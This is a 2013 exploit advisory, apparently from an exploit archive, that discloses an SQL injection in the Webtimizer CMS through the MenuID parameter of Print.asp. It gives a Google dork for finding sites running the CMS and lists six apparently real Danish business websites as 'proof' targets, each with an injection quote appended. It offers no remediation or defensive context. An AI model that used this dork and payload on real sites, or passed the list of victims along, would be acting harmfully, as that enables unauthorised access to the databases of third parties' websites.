________ __ __ __ / | / | / | / | $$$$$$$$/ __ __ ______ $$ | ______ $$/ _$$ |_ $$ |__ / \ / | / \ $$ | / \ / |/ $$ | $$ | $$ \/$$/ /$$$$$$ |$$ |/$$$$$$ |$$ |$$$$$$/ $$$$$/ $$ $$< $$ | $$ |$$ |$$ | $$ |$$ | $$ | __ $$ |_____ /$$$$ \ $$ |__$$ |$$ |$$ \__$$ |$$ | $$ |/ | $$ |/$$/ $$ |$$ $$/ $$ |$$ $$/ $$ | $$ $$/ $$$$$$$$/ $$/ $$/ $$$$$$$/ $$/ $$$$$$/ $$/ $$$$/ $$ | $$ | $$/ #******************************************************************************** # [+] Exploit Title : Webtimizer Sql injection vulnerability #********************************************************************* # [+] Software link : http://webtimiser.dk #***************************************************************** # [+] Exploit Author : Ashiyane Digital Security Team #**************************************************** # [+] Tested on: Windows 7 , Linux #********************************* # [+] Google Dork : intext:"Powered by Webtimizer" #*********************************************************** # [+] Date: 2013/09/01 #********************* -------------------------------------------------------------------- # [+] Exploit : # # [+] Location : [Target]/Print.asp?MenuID=[Sql Injection] # #------- # Proof: #------- # # http://www.kunstkonservering.dk/Print.asp?MenuID=1' # # http://www.danacolor.dk/Print.asp?MenuID=1' # # http://www.d-e-b.dk/Print.asp?MenuID=1' # # http://www.ditcon.dk/Print.asp?MenuID=1' # # http://www.freserammer.dk/Print.asp?MenuID=1' # # http://www.handymanonline.dk/Print.asp?MenuID=1' # # ###################### discovered by : ACC3SS ######################